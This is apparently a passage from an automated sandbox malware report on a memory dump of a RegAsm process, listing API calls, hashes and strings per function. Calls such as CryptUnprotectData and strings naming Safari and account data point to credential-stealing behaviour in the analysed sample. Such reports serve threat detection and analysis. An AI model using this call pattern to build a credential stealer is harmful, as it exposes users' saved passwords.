                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                            • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                            • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                            • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3664257935-0
                                                                                                                            • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                            • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                            • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                            • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                            • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                            • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                            • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                            • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                            • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                            • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                            APIs
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ??3@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 613200358-0
                                                                                                                            • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                            • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                            • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                            • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3664257935-0
                                                                                                                            • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                            • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                            • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                            • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                            APIs
                                                                                                                            • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumNamesResource
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3334572018-0
                                                                                                                            • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                            • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                            • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                            • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3664257935-0
                                                                                                                            • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                            • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                            • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                            • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                            APIs
                                                                                                                            • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFind
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1863332320-0
                                                                                                                            • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                            • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                            • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                            • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 71445658-0
                                                                                                                            • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                            • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                            • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                            • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                            • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                            • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                            • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                            • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                            • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                            • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004095FC
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                              • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                              • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                              • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3655998216-0
                                                                                                                            • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                            • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                            • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                            • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00445426
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1828521557-0
                                                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@FilePointermemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 609303285-0
                                                                                                                            • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                            • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsicmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2081463915-0
                                                                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2136311172-0
                                                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ??2@??3@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1936579350-0
                                                                                                                            • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                            • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                            • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                            • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                            APIs
                                                                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                            • memset.MSVCRT ref: 0040265F
                                                                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                            • API String ID: 2257402768-1134094380
                                                                                                                            • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                            • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                            • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                            • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                            • GetDC.USER32 ref: 004140E3
                                                                                                                            • wcslen.MSVCRT ref: 00414123
                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                            • String ID: %s:$EDIT$STATIC
